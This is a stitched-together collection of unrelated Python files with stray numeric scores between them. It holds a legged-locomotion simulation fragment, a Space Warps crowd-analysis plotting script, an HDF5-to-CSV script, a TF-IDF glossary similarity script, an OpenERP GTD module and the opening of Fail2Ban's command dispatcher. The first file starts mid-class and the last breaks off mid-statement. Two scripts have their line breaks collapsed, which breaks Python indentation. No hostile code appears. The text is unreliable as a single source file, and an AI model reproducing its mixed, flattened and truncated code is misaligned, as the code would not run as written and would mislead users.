p.mass > 0, "Params not initialized" assert p.stHalfDuty > 0 and p.stHalfDuty<pi, "Invalid duty cycle" assert all(abs(self.param) < 1e6), "Param range is sane" # Reset plane event latch; only one plane event allowed per domain entry self.planeTime = -1 res = HybSys.integrate(self,*argv,**kwarg) return res def setGround( self, gseq=() ): self.zOfsSeq = list(gseq) self.zOfs = 0 self.zOfsPos = self.csr-1 return self def changeGroundZ( self, state ): # New ground height if self.zOfsSeq: nOfs = self.zOfsSeq.pop(0) dz = nOfs - self.zOfs else: nOfs = self.zOfs dz = 0 # Next stride state[CTS.F.com_z] -= dz self.y[self.zOfsPos:self.csr,CTS.F.zOfs] = self.zOfs # Update ground state self.zOfsPos = self.csr-1 self.zOfs = nOfs def transition(self, dom, evt, state, ev ): res = CTS.TRANS.get((dom,evt),-1) if evt == EvtName.plane: if state[CTS.F.t]-self.planeTime < self.planeGap: #print "<duplicate>", state[CTS.F.t]-self.planeTime res = None else: # process a plane event #print "<plane>", state[CTS.F.t], "dt", state[CTS.F.t]-self.planeTime self.planeTime = state[CTS.F.t] if self.planeCounter > 0: res = dom self.planeCounter -= 1 else: res = -1 # Apex events trigger ground z changes elif evt==EvtName.apex: if self.toApex: res = -1 #elif hasattr(self,'zOfsSeq'): self.changeGroundZ(state) # If transitioned into fly-up if res==DomName.flyUp: # If moving downwards --> silently transition out of fly-up if state[CTS.F.com_vz]<0: res = DomName.flyDown else: # else --> liftoff event, adjust clock phases u = self.param[CTS.P.xiUpdate] c = wrap(state[CTS.F.clk]) r = self.param[CTS.P.xiLiftoff] if c<0: r -= pi state[CTS.F.clk] = c * (1-u) + r * u if res<0: if self.loud>1: print "Termination (%s,%s)-->%s" % (DomName[dom],EvtName[evt],res) return res,state def timesFor(self, dom): return (1000,self.domDt[int(dom)]) def event(self,key): if type(key)!=slice: val = [self.getEvents(key)] else: val = self.getEvents(key) st = CTSLIP_xst() ev = CTSLIP_events() return [ 
(pos,dom,evt,st.fromArray(st0).toDict(),ev.fromArray(ev0).toDict()) for (pos,dom,evt,st0,ev0) in val ] def narrate( self ): for pos,dom,evt,st,ev in self.getEvents(): print "%-8.5g at %5d %8s --> %s" % ( st[0],pos,DomName[dom],EvtName[evt] ) def plotAt( self, idx ): st = CTSLIP_xst() st.cfgFromParam( CTSLIP_param().fromArray( self.param ) ) if type(idx)==int: if idx<0: idx = [len(self)+idx] else: idx = [idx] if type(idx)==slice: idx=xrange(*idx.indices(len(self))) res = {} for k in idx: st.domain = self.d[k] st.fromArray( self.y[k,:] ) res[k] = st.plot() return res def axisPan( self, idx ): ax = axis() st = CTSLIP_xst() X = self.y[idx,st.com_x] X0 = (ax[0]+ax[1])/2.0 ax =( ax[0]-X0+X, ax[1]-X0+X ) + ax[2:] axis(ax) def energy( self ): s = CTSLIP_xst() p = CTSLIP_param().fromArray(self.param) # Useful subset of samples y = self.y[:self.csr,:] # Reference lengths for legs l0r = sqrt( y[:,s.ref_x_0]**2 + y[:,s.ref_z_0]**2 ) l1r = sqrt( y[:,s.ref_x_1]**2 + y[:,s.ref_z_1]**2 ) # Actual lengths for legs l0 = sqrt( y[:,s.leg_x_0]**2 + y[:,s.leg_z_0]**2 ) l1 = sqrt( y[:,s.leg_x_1]**2 + y[:,s.leg_z_1]**2 ) # Velocity squared v2 = y[:,s.com_vx]**2 + y[:,s.com_vz]**2 # Unit vector along gravity down = numpy.array([p.gravityX,p.gravityZ]) g = norm(down) down = down / g # Height h = -down[0]*y[:,s.com_x]-down[1]*(y[:,s.com_z]+y[:,s.zOfs]) # Kinetic energy ek = 0.5*p.mass*v2 # Gravitational energy eg = p.mass*g*h # Elastic energy el0 = 0.5*p.stK*(l0r-l0)**2 # set to 0 when leg is not in stance numpy.put( el0, self.d[:self.csr] & 1 == 0, 0 ) # Elastic energy el1 = 0.5*p.stK*(l1r-l1)**2 # set to 0 when leg is not in stance numpy.put( el1, self.d[:self.csr] & 1 == 0, 0 ) return numpy.c_[el0+el1+ek+eg,ek,eg,el0,el1,l0r,l0,l1r,l1,sqrt(v2)] def sectionmap( self, args, depth = 1, preslc = slice(None,-1), postslc = slice(1,None), skip=0 ): self.toApex = False pre = [] post = [] vel = [] for arg in args: self.planeCounter = depth self.planeTime = -1 self.mapping( arg ) # Get positions of 
plane events slc = asarray([ ev[0] for ev in self.getEvents() if (ev[2] == EvtName.plane and ev[1] in [DomName.flyUp, DomName.flyDown] and ev[0] > skip) ]) # Get indices of pre-slice entries prei = slc[preslc] posti = slc[postslc] if not prei or not posti: print "!",#"WARNING: no plane events" continue # Get values at pre, pre+1, post pre0 = self.y[prei,:] delta = self.y[prei+1,:] - pre0 post0 = self.y[posti,:] if 0: print "<>",len(slc),len(self.seq),y0.planeVal(pre0) subplot(211) plot( self.y[slc,s.t], self.y[slc,s.com_vz], '.r') plot( self.x[-1,s.t], self.x[-1,s.com_vz], 'or') plot( self.x[:,s.t], self.x[:,s.com_vz]) plot( pre0[:,s.t], pre0[:,s.com_vz], 'vk') plot( post0[:,s.t], post0[:,s.com_vz], '^y') subplot(212) plot( self.y[slc,s.t], y0.planeVal(self.y[slc,:]), '.r') plot( self.x[:,s.t], y0.planeVal(self.x), ',-' ) plot( pre0[:,s.t], y0.planeVal(pre0), 'vk') plot( post0[:,s.t],y0.planeVal(post0) , '^y') pre.append(pre0) vel.append(delta) post.append(post0) if 0: subplot(211); grid(1) subplot(212); grid(1) print "Found ", len(pre) return ( concatenate(pre,axis=0), concatenate(post,axis=0), concatenate(vel,axis=0) ) def apexMap( self, args ): """ Compute the apex map, penalizing termination due to other events """ self.toApex = True post = self.mapping(args) if self.seq[-1][2] != EvtName.apex: post += 1e5 return post def apexError( self, args ): """ Compute sum-squared error of apex map. 
First args entry must be clock phase """ idx = [ self.F.clk, self.F.com_vx, self.F.com_z ] post = asarray(self.apexMap(args)) pre = self.x[0,idx] post = self.x[-1,idx] post[0] = post[0] % pi return norm((post-pre)*array([0.1,1,1])) def apexStability( self, args ): assert self.F.clk == self.icsMap[0] assert self.F.clk == self.rtnMap[0] args = asarray(args) args[0] = args[0] % pi post1 = asarray(self.apexMap(args)) post1[0] = post1[0] % pi post2 = asarray(self.apexMap(post1)) post2[0] = post2[0] % pi return norm(post1-args) + norm(post2-post2)/norm(post1-args) def apexFixedPoint( self ): """ Find a nearby fixed-point of the apex map """ ic = concatenate((self.y[0,self.icsMap],self.param[self.parMap])) opt = scipy.optimize.fixed_point( self.apexMap, ic, xtol=1e-5 ) self.useArgs( opt ) return opt def mapseq( self, maxlen=100 ): r = [] while self.seq[-1][2] in [EvtName.apex, EvtName.plane] and len(r)<maxlen: r.append(self.y[0,:].copy()) self.remap() r = array(r) return r # ENDS: class CTS def wrap( ang ): ang = numpy.asarray(ang) return ang - floor((ang+pi)/(2*pi))*(2*pi)
0.037492
#!/usr/bin/env python from subprocess import call import sys,getopt,numpy as np import matplotlib from pylab import *; import swap def make_info_plots(argv): """ NAME make_info_plots PURPOSE Given stage1 and stage2 bureau pickles, this script produces the several plots for the crowd analysis COMMENTS FLAGS -h Print this message INPUTS stage1_bureau.pickle stage2_bureau.pickle OUTPUTS Various png plots. EXAMPLE BUGS - Code is not tested yet... AUTHORS This file is part of the Space Warps project, and is distributed under the MIT license by the Space Warps Science Team. http://spacewarps.org/ HISTORY 2014-06-27 started More & More (Kavli IPMU) """ # ------------------------------------------------------------------ try: opts, args = getopt.getopt(argv,"h",["help"]) except getopt.GetoptError, err: print str(err) # will print something like "option -a not recognized" print make_info_plots.__doc__ # will print the big comment above. return for o,a in opts: if o in ("-h", "--help"): print make_info_plots.__doc__ return else: assert False, "unhandled option" # Check for pickles in array args: if len(args) == 2: bureau1_path = args[0] bureau2_path = args[1] print "make_info_plots: illustrating behaviour captured in bureau files: " print "make_info_plots: ",bureau1_path print "make_info_plots: ",bureau2_path else: print make_info_plots.__doc__ return # Read in bureau objects: bureau1 = swap.read_pickle(bureau1_path, 'bureau') bureau2 = swap.read_pickle(bureau2_path, 'bureau') print "make_info_plots: stage 1, 2 agent numbers: ",len(bureau1.list()), len(bureau2.list()) experience1 = [] effort1 = [] final_skill1 = [] final_PL1 =[] final_PD1 =[] information1 = [] contribution1 = [] experience2 = [] effort2 = [] final_skill2 = [] final_PL2 =[] final_PD2 =[] information2 = [] contribution2 = [] ## Ntrajectory=50 for ID in bureau1.list(): agent = bureau1.member[ID] effort1.append(agent.N-agent.NT) experience1.append(agent.NT) final_skill1.append(agent.traininghistory['Skill'][-1]) 
final_PL1.append(np.mean(agent.get_PL_realization(Ntrajectory))) final_PD1.append(np.mean(agent.get_PD_realization(Ntrajectory))) information1.append(agent.testhistory['I'].sum()) contribution1.append(agent.testhistory['Skill'].sum()) for ID in bureau2.list(): agent = bureau2.member[ID] effort2.append(agent.N-agent.NT) experience2.append(agent.NT) final_skill2.append(agent.traininghistory['Skill'][-1]) final_PL2.append(np.mean(agent.get_PL_realization(Ntrajectory))) final_PD2.append(np.mean(agent.get_PD_realization(Ntrajectory))) information2.append(agent.testhistory['I'].sum()) contribution2.append(agent.testhistory['Skill'].sum()) ## PL-PD plot def plotplpd(xx,yy,zz,which,ztitle): bins=100; ax=subplot(2,2,which,aspect=1.); hist2d(xx,yy,bins,weights=zz,norm=matplotlib.colors.LogNorm()); cbar=colorbar(); cbar.solids.set_edgecolor("face"); ax.set_xlabel("P$_L$"); ax.set_ylabel("P$_D$"); ax.set_title(ztitle); ax.set_xlim(0,1); ax.set_ylim(0,1); xx=np.arange(-0.1,2,0.1); ax.axhline(0.5,color="k",linestyle='dashed'); ax.axvline(0.5,color="k",linestyle='dashed'); ax.plot(xx,1-xx,color="k"); ########################### ##Users ########################### plotplpd(final_PL1,final_PD1,None,1,"Stage1 Users") plotplpd(final_PL2,final_PD2,None,2,"Stage2 Users") savefig("users_plpd.png") clf(); ########################### ##Effort ########################### plotplpd(final_PL1,final_PD1,effort1,1,"Stage 1 Effort") plotplpd(final_PL2,final_PD2,effort2,2,"Stage 2 Effort") savefig("effort_plpd.png") clf(); ########################### ##Experience ########################### plotplpd(final_PL1,final_PD1,experience1,1,"Stage 1 Experience") plotplpd(final_PL2,final_PD2,experience2,2,"Stage 2 Experience"); savefig("experience_plpd.png") clf(); ########################### ##Contribution ########################### plotplpd(final_PL1,final_PD1,contribution1,1,"Stage 1 Contribution") plotplpd(final_PL2,final_PD2,contribution2,2,"Stage 2 Contribution") savefig("contribution_plpd.png") 
clf(); ########################### ##Average Information ########################### plotplpd(final_PL1,final_PD1,information1,1,"Stage 1 Information") plotplpd(final_PL2,final_PD2,information2,2,"Stage 2 Information") savefig("information_plpd.png") clf(); ########################### ##Skill PL PD plot ########################### bins=101 skill=np.zeros(bins*bins); skill=np.reshape(skill,(bins,bins)); for ii in range(bins): M_ll=0.01*ii; for jj in range(bins): M_nn=0.01*jj; skill[ii][jj]=swap.expectedInformationGain(0.5, M_ll, M_nn); ax=subplot(1,1,1); im=ax.imshow(skill,origin='lower',extent=(0,1,0,1)); cbar=colorbar(im); cbar.solids.set_edgecolor("face"); ax.set_xlim(0,1); ax.set_ylim(0,1); ax.set_xlabel("P$_L$"); ax.set_ylabel("P$_D$"); ax.set_title("Skill"); xx=np.arange(-0.1,2,0.1); ax.axhline(0.5,color="k",linestyle='dashed'); ax.axvline(0.5,color="k",linestyle='dashed'); ax.plot(xx,1-xx,color="k"); savefig("skill_plpd.png") clf(); ########################### ## Cumulative effort and users vs. skill ########################### bins=100 ax=subplot(2,2,1); hist(final_skill1,bins,cumulative=True,normed=1,color=(0.8,0.2,0.2),histtype='stepfilled',label="Users",range=(0,1)); hist(final_skill1,bins,weights=effort1, cumulative=True,color=(1.0,0.7,0.5),normed=1,histtype='stepfilled',label="Effort",range=(0,1)); ax.set_xlabel("Skill"); ax.set_ylim(0,1.) ax.set_ylabel("Cumulative Fraction"); ax.set_title("Stage 1") legend(loc=4); ax=subplot(2,2,2); hist(final_skill2,bins,cumulative=True,normed=1,color=(0.8,0.2,0.2),histtype='stepfilled',label="Users",range=(0,1)); hist(final_skill2,bins,weights=effort2, cumulative=True,color=(1.0,0.7,0.5),normed=1,histtype='stepfilled',label="Effort",range=(0,1)); ax.set_xlabel("Skill"); ax.set_ylim(0,1.) 
ax.set_ylabel("Cumulative Fraction"); ax.set_title("Stage 2") legend(loc=4); savefig("skill_effort_users_cum.png") clf(); ########################### ## Training histories of first 20 agents with final skill > 0.5 and <0.5 for Stage 1 and 2 ########################### final_skill1=np.array(final_skill1) idx=(final_skill1>0.5) idxl=(final_skill1<0.5) ax=subplot(2,2,1); ax.set_xscale('log'); ax.set_xlabel("Experience") ax.set_ylabel("Skill") ax.set_title("Stage1") ii=0; for idxx,ID in zip(idx,bureau1.list()): if(ii>20): break; if(not idxx): continue; agent = bureau1.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="green", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="green", alpha=0.5) ii=ii+1 ii=0; for idxx,ID in zip(idxl,bureau1.list()): if(ii>20): break; if(not idxx): continue; agent = bureau1.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="red", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="red", alpha=0.5) ii=ii+1 final_skill2=np.array(final_skill2) idx=(final_skill2>0.5) idxl=(final_skill2<0.5) ax=subplot(2,2,2); ax.set_xscale('log'); ax.set_xlabel("Experience") ax.set_ylabel("Skill") ax.set_title("Stage2") for idxx,ID in zip(idx,bureau2.list()): if(not idxx): continue; agent = bureau2.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="green", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="green", alpha=0.5) ii=0; for idxx,ID in zip(idxl,bureau2.list()): if(ii>20): break; if(not idxx): continue; agent = bureau2.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="red", alpha=0.2, linewidth=2.0, 
linestyle="-") ax.scatter(N[-1], I[-1], color="red", alpha=0.5) ii=ii+1 tight_layout(); savefig("skill_experience.png") clf(); ########################### ## function to plot 2d histograms ########################### def plothist2d(xx,yy,zz,which,xlab,ylab,ztitle): bins=100; ax=subplot(2,2,which); xx=np.array(xx) yy=np.array(yy) zz=np.array(zz) idx=np.where(xx>0) hist2d(np.log10(xx[idx]),yy[idx],bins,weights=zz[idx],norm=matplotlib.colors.LogNorm()); cbar=colorbar(); cbar.solids.set_edgecolor("face"); ax.set_xlabel(xlab); ax.set_ylabel(ylab); ax.set_title(ztitle); ########################### ## Contribution as a function of experience vs. skill ########################### plothist2d(experience1,final_skill1,contribution1,1,"Log(Experience)","Skill","Stage 1 Contribution") plothist2d(experience2,final_skill2,contribution2,2,"Log(Experience)","Skill","Stage 2 Contribution") savefig("experience_skill_contribution.png") clf(); ########################### ## Contribution as a function of effort vs. skill ########################### plothist2d(effort1,final_skill1,contribution1,1,"Log(Effort)","Skill","Stage 1 Contribution") plothist2d(effort2,final_skill2,contribution2,2,"Log(Effort)","Skill","Stage 2 Contribution") savefig("effort_skill_contribution.png") clf(); if __name__ == '__main__': make_info_plots(sys.argv[1:])
0.03679
"""Read the time series and output a csv""" import argparse import h5py import csv import sys import numpy as np parser = argparse.ArgumentParser( __doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument( "file", nargs=1, help="hdf5 file" ) if __name__ == '__main__': args = parser.parse_args() file_name = args.file[0] hdf5_file = h5py.File(file_name, "r") hdf5_group = hdf5_file["raw_images"] writer = csv.writer(sys.stdout) exposures = [0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1] n_files = [1000, 1000, 1000, 500, 500, 500, 200, 200, 200, 100] writer.writerow(["exposure", "signal", "noise", "snr"]) datasets = np.array([dataset for dataset in hdf5_group.values()]) print(datasets.shape) i = 0 for exposure, n in zip(exposures, n_files): dataset = datasets[i:(i + n), 0, ...] print(dataset.shape) i += n signal = np.mean(dataset, axis=0) noise = np.std(dataset, axis=0) snr = signal / noise writer.writerow([exposure, signal, noise, snr]) hdf5_file.close()
0
# Glossary concept-similarity analysis script (Python 2).
#
# NOTE(review): this file arrived with its physical line structure collapsed;
# the indentation below is a reconstruction from the statement order and must
# be confirmed against the original file — in particular (a) whether
# `docs.append(instr)` sits inside the word loop (growing prefixes) or after
# it, and (b) where the per-concept statistics block ends.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
import statistics
#from scipy.stats import norm
import scipy as sp
from scipy import stats
from scipy.stats import norm
from lxml import etree

# Expected XML shape: <Entry><Term>..</Term><Concept>..</Concept>...</Entry>
# (inferred from the findall()/find() calls below — TODO confirm).
glossary = etree.parse("glossary.xml")

detval = []  # one detection threshold (thld1) appended per concept, across all entries
num = 1      # running concept counter (diagnostic only; never printed in this version)
for entry_obj in glossary.findall("Entry"):
    concepts = []  # raw concept texts of the current entry
    conList = []   # cosine similarities accumulated for the threshold statistics
    term_name = entry_obj.find("Term").text.lower()
    #print term_name
    #connum = 0
    #if term_name == "firewall":
    print term_name
    length = 1
    for concept_obj in entry_obj.findall("Concept"):
        #print concept_obj.text
        #connum += 1
        #if len(concept_obj) < 6:
        #continue
        length += 1
        #print concept_obj.text
        splitgroup = concept_obj.text.split(' ')
        #if len(splitgroup) < 6:
        #continue
        concepts.append(concept_obj.text)
        # docs[0] is the full concept text; each appended doc is a growing
        # word-prefix of it, so row[1:] below measures how the similarity to
        # the full text evolves as words are added.
        docs = [concept_obj.text]
        # get each word
        instr = ""
        for word in splitgroup:
            instr += (' ' + word)
            docs.append(instr)
        tfidf_vectorizer = TfidfVectorizer()
        tfidf_matrix = tfidf_vectorizer.fit_transform(docs)
        #print tfidf_matrix.shape
        # Similarity of the full concept (row 0) against every doc, itself included.
        matrix = cosine_similarity(tfidf_matrix[0:1], tfidf_matrix)
        #print matrix
        for row in matrix:
            for x in row[1:]:  # skip column 0: self-similarity is always 1.0
                conList.append(x)
        #print (statistics.median(conList) /statistics.pstdev(conList))
        #thld = statistics.median(conList) + statistics.pstdev(conList)
        # Threshold derivation: 95% normal CI around the mean similarity;
        # thld1 mixes one population stdev with the CI lower bound.
        # NOTE(review): conList is reset per ENTRY, not per concept, so later
        # concepts' statistics include earlier concepts' values — confirm intent.
        mean = statistics.mean(conList)
        conf = stats.norm.interval(0.95 ,loc=mean,scale=statistics.pstdev(conList))
        thld1 = 1 - (1*statistics.pstdev(conList)) - conf[0]
        thld2 = 1 - (2*statistics.pstdev(conList))
        #print thld1 - conf[0]
        if thld1 > 1:
            # thld is computed but never used afterwards (dead assignment).
            thld = (statistics.median(conList))
        detval.append(thld1)
        #print thld1
        #print thld2
        num += 1
        #break
    # Pairwise similarity between all concepts of this entry.
    # NOTE(review): reuses the vectorizer fitted on the LAST concept's docs,
    # and detval is indexed by row below although it accumulates across ALL
    # entries — correct only when a single entry is processed. Confirm.
    #tfidf_vectorizer = TfidfVectorizer()
    tfidf_matrix = tfidf_vectorizer.fit_transform(concepts)
    #print tfidf_matrix.shape
    matrix = cosine_similarity(tfidf_matrix[0:len(concepts)], tfidf_matrix)
    #print matrix
    index = 0
    #print 2*"\n"
    rnum = 1
    for row in matrix:
        xindex = 0
        for x in row:
            # Report off-diagonal concept pairs whose similarity clears the
            # per-concept threshold computed above.
            if x >= detval[index]:
                #print index , xindex
                if xindex == index:
                    # NOTE(review): this `continue` also skips the
                    # `xindex += 1` below, desynchronising the column
                    # counter — looks like a bug; confirm against original.
                    continue
                else:
                    #x
                    #print "same"
                    #print "Match - Row: ", row, "Value: " , x
                    #print concepts[index]
                    #print concepts[xindex]
                    print rnum, " Row - ", index, "Column - ", xindex, "Value needed - ",detval[index], " Matched on - ", x
                    rnum += 1
            xindex += 1
        index += 1
print "Done"
0.06746
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from openerp.osv import fields, osv
from openerp import tools


class project_gtd_context(osv.Model):
    """GTD context: the place/situation in which a task can be treated."""
    _name = "project.gtd.context"
    _description = "Context"
    _columns = {
        'name': fields.char(
            'Context', size=64, required=True, translate=True),
        'sequence': fields.integer(
            'Sequence', help=("Gives the sequence order when displaying "
                              "a list of contexts.")),
    }
    _defaults = {
        'sequence': 1
    }
    _order = "sequence, name"


class project_gtd_timebox(osv.Model):
    """GTD timebox: the time-lapse during which a task has to be treated."""
    _name = "project.gtd.timebox"
    _order = "sequence"
    _columns = {
        'name': fields.char(
            'Timebox', size=64, required=True, select=1, translate=1),
        'sequence': fields.integer(
            'Sequence', help="Gives the sequence order when displaying "
                             "a list of timebox."),
    }


class project_task(osv.Model):
    """Extend project.task with GTD timebox/context fields and navigation."""
    _inherit = "project.task"
    _columns = {
        'timebox_id': fields.many2one(
            'project.gtd.timebox',
            "Timebox",
            help="Time-laps during which task has to be treated"),
        'context_id': fields.many2one(
            'project.gtd.context',
            "Context",
            help="The context place where user has to treat task"),
    }

    def _get_context(self, cr, uid, context=None):
        """Default context_id: first project.gtd.context found, else False."""
        ids = self.pool.get('project.gtd.context').search(
            cr, uid, [], context=context)
        return ids and ids[0] or False

    def _read_group_timebox_ids(
            self, cr, uid, ids, domain, read_group_order=None,
            access_rights_uid=None, context=None):
        """Used to display all timeboxes on the view."""
        timebox_obj = self.pool.get('project.gtd.timebox')
        order = timebox_obj._order
        access_rights_uid = access_rights_uid or uid
        timebox_ids = timebox_obj._search(
            cr, uid, [], order=order, access_rights_uid=access_rights_uid,
            context=context)
        result = timebox_obj.name_get(
            cr, access_rights_uid, timebox_ids, context=context)
        # Restore order of the search
        result.sort(
            lambda x, y: cmp(timebox_ids.index(x[0]),
                             timebox_ids.index(y[0])))
        # No group is folded by default.
        fold = dict.fromkeys(timebox_ids, False)
        return result, fold

    _defaults = {
        'context_id': _get_context
    }
    _group_by_full = {
        'timebox_id': _read_group_timebox_ids,
    }

    def copy_data(self, cr, uid, id, default=None, context=None):
        """Duplicating a task clears its timebox and context assignments."""
        if context is None:
            context = {}
        if not default:
            default = {}
        default['timebox_id'] = False
        default['context_id'] = False
        return super(project_task, self).copy_data(
            cr, uid, id, default, context)

    def next_timebox(self, cr, uid, ids, *args):
        """Move each task to the next timebox (by search order);
        unassigned tasks get the first timebox."""
        timebox_obj = self.pool.get('project.gtd.timebox')
        timebox_ids = timebox_obj.search(cr, uid, [])
        if not timebox_ids:
            return True
        for task in self.browse(cr, uid, ids):
            timebox = task.timebox_id
            if not timebox:
                self.write(cr, uid, task.id, {'timebox_id': timebox_ids[0]})
            elif timebox_ids.index(timebox) != len(timebox_ids)-1:
                # NOTE(review): timebox_ids is a list of ids but `timebox` is
                # a browse record — confirm that .index() matches here (it may
                # need `timebox.id`).
                index = timebox_ids.index(timebox)
                self.write(
                    cr, uid, task.id, {'timebox_id': timebox_ids[index+1]})
        return True

    def prev_timebox(self, cr, uid, ids, *args):
        """Move each task to the previous timebox; from the first timebox,
        clear the assignment instead."""
        timebox_obj = self.pool.get('project.gtd.timebox')
        timebox_ids = timebox_obj.search(cr, uid, [])
        for task in self.browse(cr, uid, ids):
            timebox = task.timebox_id
            if timebox:
                if timebox_ids.index(timebox):
                    # NOTE(review): same browse-record-vs-id concern as in
                    # next_timebox above.
                    index = timebox_ids.index(timebox)
                    self.write(
                        cr, uid, task.id,
                        {'timebox_id': timebox_ids[index - 1]})
                else:
                    self.write(cr, uid, task.id, {'timebox_id': False})
        return True

    def fields_view_get(self, cr, uid, view_id=None, view_type='form',
                        context=None, toolbar=False, submenu=False):
        """Inject one search filter per timebox into the search view when the
        context carries the 'gtd' flag (replaces the <separator name="gtdsep"/>
        placeholder in the view arch)."""
        if not context:
            context = {}
        res = super(project_task, self).fields_view_get(
            cr, uid, view_id, view_type, context, toolbar=toolbar,
            submenu=submenu)
        search_extended = False
        timebox_obj = self.pool.get('project.gtd.timebox')
        if (res['type'] == 'search') and context.get('gtd', False):
            timeboxes = timebox_obj.browse(
                cr, uid, timebox_obj.search(cr, uid, []), context=context)
            search_extended = ''
            for timebox in timeboxes:
                filter_ = u"""
                    <filter domain="[('timebox_id', '=', {timebox_id})]"
                            string="{string}"/>\n
                    """.format(timebox_id=timebox.id, string=timebox.name)
                search_extended += filter_
            search_extended += '<separator orientation="vertical"/>'
            res['arch'] = tools.ustr(res['arch']).replace(
                '<separator name="gtdsep"/>', search_extended)
        return res

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
0
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :

# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

# Author: Cyril Jaquier
#

__author__ = "Cyril Jaquier"
__copyright__ = "Copyright (c) 2004 Cyril Jaquier"
__license__ = "GPL"

import time
import json

from ..helpers import getLogger
from .. import version

# Gets the instance of the logger.
logSys = getLogger(__name__)


class Transmitter:
	"""Decodes client commands and dispatches them to the server object.

	Commands are sequences: command[0] is the verb ("ping", "add", "set",
	"get", "status", ...) and the remaining items are its arguments.
	"""

	##
	# Constructor.
	#
	# @param The server reference

	def __init__(self, server):
		self.__server = server

	##
	# Proceeds a command.
	#
	# Proceeds an incoming command.
	# @param command The incoming command

	def proceed(self, command):
		"""Run one command; return (0, result) on success, (1, exc) on failure."""
		# Deserialize object
		logSys.debug("Command: " + repr(command))
		try:
			ret = self.__commandHandler(command)
			ack = 0, ret
		except Exception as e:
			logSys.warning("Command %r has failed. Received %r" % (command, e))
			ack = 1, e
		return ack

	##
	# Handle an command.
	#
	#
	def __commandHandler(self, command):
		"""Top-level verb dispatch; raises Exception on unknown commands."""
		if command[0] == "ping":
			return "pong"
		elif command[0] == "add":
			name = command[1]
			# "all" is reserved for the broadcast form of other commands.
			if name == "all":
				raise Exception("Reserved name")
			try:
				backend = command[2]
			except IndexError:
				backend = "auto"
			self.__server.addJail(name, backend)
			return name
		elif command[0] == "start":
			name = command[1]
			self.__server.startJail(name)
			return None
		elif command[0] == "stop":
			# "stop" alone shuts the server down; "stop all" / "stop <jail>"
			# stop jails only.
			if len(command) == 1:
				self.__server.quit()
			elif command[1] == "all":
				self.__server.stopAllJail()
			else:
				name = command[1]
				self.__server.stopJail(name)
			return None
		elif command[0] == "sleep":
			value = command[1]
			time.sleep(int(value))
			return None
		elif command[0] == "flushlogs":
			return self.__server.flushLogs()
		elif command[0] == "set":
			return self.__commandSet(command[1:])
		elif command[0] == "get":
			return self.__commandGet(command[1:])
		elif command[0] == "status":
			return self.status(command[1:])
		elif command[0] == "version":
			return version.version
		raise Exception("Invalid command")

	def __commandSet(self, command):
		"""Handle "set <name> ..."; command[0] is either a global option name
		(loglevel, logtarget, dbfile, ...) or a jail name followed by a
		jail-level option in command[1]."""
		name = command[0]
		# Logging
		if name == "loglevel":
			value = command[1]
			self.__server.setLogLevel(value)
			return self.__server.getLogLevel()
		elif name == "logtarget":
			value = command[1]
			if self.__server.setLogTarget(value):
				return self.__server.getLogTarget()
			else:
				raise Exception("Failed to change log target")
		elif name == "syslogsocket":
			value = command[1]
			if self.__server.setSyslogSocket(value):
				return self.__server.getSyslogSocket()
			else:
				raise Exception("Failed to change syslog socket")
		#Database
		elif name == "dbfile":
			self.__server.setDatabase(command[1])
			db = self.__server.getDatabase()
			if db is None:
				return None
			else:
				return db.filename
		elif name == "dbpurgeage":
			db = self.__server.getDatabase()
			if db is None:
				logSys.warning("dbpurgeage setting was not in effect since no db yet")
				return None
			else:
				db.purgeage = command[1]
				return db.purgeage
		# Jail
		elif command[1] == "idle":
			if command[2] == "on":
				self.__server.setIdleJail(name, True)
			elif command[2] == "off":
				self.__server.setIdleJail(name, False)
			else:
				raise Exception("Invalid idle option, must be 'on' or 'off'")
			return self.__server.getIdleJail(name)
		# Filter
		elif command[1] == "addignoreip":
			value = command[2]
			self.__server.addIgnoreIP(name, value)
			return self.__server.getIgnoreIP(name)
		elif command[1] == "delignoreip":
			value = command[2]
			self.__server.delIgnoreIP(name, value)
			return self.__server.getIgnoreIP(name)
		elif command[1] == "ignorecommand":
			value = command[2]
			self.__server.setIgnoreCommand(name, value)
			return self.__server.getIgnoreCommand(name)
		elif command[1] == "addlogpath":
			value = command[2]
			# Optional 4th argument selects whether reading starts at the
			# end ("tail") or beginning ("head", default) of the file.
			tail = False
			if len(command) == 4:
				if command[3].lower() == "tail":
					tail = True
				elif command[3].lower() != "head":
